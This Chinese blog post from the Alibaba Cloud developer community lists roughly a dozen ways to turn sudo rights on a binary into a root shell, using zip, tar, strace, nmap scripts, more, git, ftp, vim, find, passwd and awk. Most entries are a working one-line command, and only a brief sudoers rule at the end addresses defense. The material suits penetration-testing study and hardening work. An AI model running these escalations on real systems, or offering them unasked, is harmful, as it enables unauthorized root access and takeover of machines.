AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

sudo提权

2018-09-26 3076
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 参考文献:http://zone.secevery.com/article/989https://www.anquanke.com/post/id/158511sudo概念:sudo (Substitute User and Do 的简写)临时授权,可以临时让其以root 权限运行某个程序。


sudo概念:

sudo (Substitute User and Do 的简写)临时授权,可以临时让其以root 权限运行某个程序。在/etc/sudoers中设置了可执行sudo指令的用户。

各种提权操作

①su

test@ubuntu:/tmp$ sudo su - root

②zip

test@ubuntu:/tmp$ sudo zip /tmp/1.zip /tmp/test -T --unzip-command="sh -c /bin/bash"#1.zip是随手添加进去的一个zip文件
#-T 表示测试1.zip的完整性
# --unzip-command 与-T 一起使用,可以指定自定义命令用于解压1.zip
#可以自定义用于解压test.zip 的的命令,自定义解压命令是以root权限执行的,指定为sh -c /bin/bash, 获取一个root权限的shell

③tar

test@ubuntu:/tmp$sudo tar cf /dev/null test --checkpoint=1 --checkpoint-action=exec=/bin/bash
#–checkpoint-action 选项是提权点,可以自定义需要执行的动作,指定为exec=/bin/bash,获取一个root权限的shell

④strace

test@ubuntu:/tmp$sudo strace -o/dev/null /bin/bash
#strace 以root权限运行跟踪调试/bin/bash, 从而获取root权限的shell

⑤nmap

test@ubuntu:/tmp$ echo "os.execute('/bin/sh')">/tmp/shell.nse
test@ubuntu:/tmp$ sudo nmap --script=/tmp/shell.nse

⑥more

test@ubuntu:/tmp$sudo more /etc/rsyslog.conf
然后加上!/bin/bash 即可获取root权限的shell

⑦git

test@ubuntu:/tmp$sudo git help status
然后加上!/bin/bash 即可获取root权限的shell

⑧ftp

test@ubuntu:/tmp$ sudo ftp
ftp> !/bin/bash

⑨vim

test@ubuntu:/tmp$ sudo vim -c '!sh

⑩find

test@ubuntu:/tmp$ sudo find /bin/ -name ls -exec /bin/bash \;
#对于find 检索到的每一个结果,都执行/bin/bash, 是以root权限执行的

⑩①passwd

test@ubuntu:/tmp$ sudo passwd
Enter new UNIX password: 
Retype new UNIX password:

⑩②awk

test@ubuntu:/etc$ sudo awk 'BEGIN {system("/bin/bash")}'

防止有sudo权限的普通用户修改root用户的密码

/etc/sudoers添加:

test  ALL=(root)     !/usr/bin/passwd, /usr/bin/passwd [A-Za-z]*, !/usr/bin/passwd root
#用户账号,登陆来源的主机名,可切换的身份,可执行的命令
文章标签:
开发工具
Perl
Shell
Unix
数据安全/隐私保护
git
spleated
目录
相关文章
Klaus
|
7月前
|
安全 网络协议 Shell
Linux sudo 以其他身份来执行命令
Linux sudo 以其他身份来执行命令
Klaus
77 0
yuanfan_2012
|
安全 Unix Linux
CentOS7 Sudo本地提权漏洞修复实践
CentOS7 Sudo本地提权漏洞修复实践
yuanfan_2012
1005 0
CentOS7 Sudo本地提权漏洞修复实践
是乙太呀
|
2月前
|
安全 Shell 网络安全
uvalde-bash提权
uvalde-bash提权
是乙太呀
20 1
qq2108462953
|
4月前
|
Ubuntu 网络安全 数据安全/隐私保护
Ubuntu 普通用户修改sudoers导致无法使用sudo的解决办法
Ubuntu 普通用户修改sudoers导致无法使用sudo的解决办法
qq2108462953
144 2
稻草人敲代码
|
7月前
|
Linux 开发工具
linux sudo指令提权
linux sudo指令提权
稻草人敲代码
87 0
wljslmz
|
7月前
|
安全 Linux 数据安全/隐私保护
Linux命令 su 和 sudo 的区别
【2月更文挑战第5天】
wljslmz
126 0
Linux命令 su 和 sudo 的区别
听风de歌
|
7月前
|
Linux Shell 数据安全/隐私保护
linux命令之sudo/su
linux命令之sudo/su
听风de歌
149 7
Iric
|
网络安全 数据安全/隐私保护
sudo 权限问题
sudo 权限问题
Iric
231 1
江湖有缘
|
Linux 数据安全/隐私保护
Linux系统之普通用户sudo提权配置
Linux系统之普通用户sudo提权配置
江湖有缘
333 0
网站安全
|
运维 安全 Linux
Linux服务器安全防护 可SUDO提权到管理员
linux一直以来很少有漏洞,稳定,高效,安全.深受网站,app运营者的喜欢与青睐,很多网站服务器的运营技术和运维,在维护服务器的同时都会使用sudo命令来做安全,殊不知sudo近期被爆出漏洞,并登上CVE-2019-14287级别,可见漏洞的危害性较大.Linux漏洞,目前来看使用centos系统的服务器,以及网站都会受到该漏洞的影响,我们SINE安全建议大家尽快升级sudo的版本到最新的1.8.28版本,将损失降到最低.防止网站,服务器,APP因为LINUX漏洞被攻击.
网站安全
3879 0
Linux服务器安全防护 可SUDO提权到管理员

热门文章

最新文章

  • 1
    基于区块链的机器学习模型创建方案
  • 2
    性能的极致,Rust的加持,Zed-Dev编辑器快速搭建Python3.10开发环境
  • 3
    首届Global VR Hackathon完结 全球前三甲诞生
  • 4
    我的博客即将入驻“云栖社区”,诚邀技术同仁一同入驻。
  • 5
    iptables
  • 6
    DevExpress 10.2.4系列-ASPxListBox根据列值不同设置不同图标
  • 7
    jquery的load加载js页面到指定div中
  • 8
    分享平时工作中那些给力的shell命令(更新版)
  • 9
    如何在ubuntu下用SVN commit
  • 10
    hdu 1800 Flying to the Mars
  • 1
    HelloMeme:开源的面部表情与姿态迁移框架,将视频中的人物表情迁移到静态图像中生成动态视频
    102
  • 2
    VSI-Bench:李飞飞谢赛宁团队推出视觉空间智能基准测试集,旨在评估多模态大语言模型在空间认知和理解方面的能力
    32
  • 3
    CLEAR:新加坡国立大学推出线性注意力机制,使8K图像的生成速度提升6.3倍,显著减少了计算量和时间延迟
    35
  • 4
    Kheish:开源的多智能体开发框架,通过 YAML 配置工作流和多个 Agent 共同协作解决复杂任务
    41
  • 5
    Bamba-9B:基于 Mamba2 架构的仅解码语言模型,旨在提高大型语言模型在推理时的效率
    37
  • 6
    DisPose:清华北大等多所高校联合推出基于人物图像增强视频生成技术,实现对人物动画的准确控制和一致性
    42
  • 7
    InvSR:开源图像超分辨率生成模型,提升分辨率,修复老旧照片为超清图像
    41
  • 8
    Univer:开源全栈 AI 办公工具,支持 Word、Excel、PPT 等文档处理和多人实时协作
    29
  • 9
    《人工智能:驱散新材料数据噪声与填补缺失值的曙光》
    28
  • 10
    《人工智能:解锁新材料最佳掺杂元素及比例的密码》
    21

    • 相关电子书

    更多
  • 低代码开发师(初级)实战教程
  • 冬季实战营第三期:MySQL数据库进阶实战
  • 阿里巴巴DevOps 最佳实践手册
    • 下一篇
    DataWorks售前咨询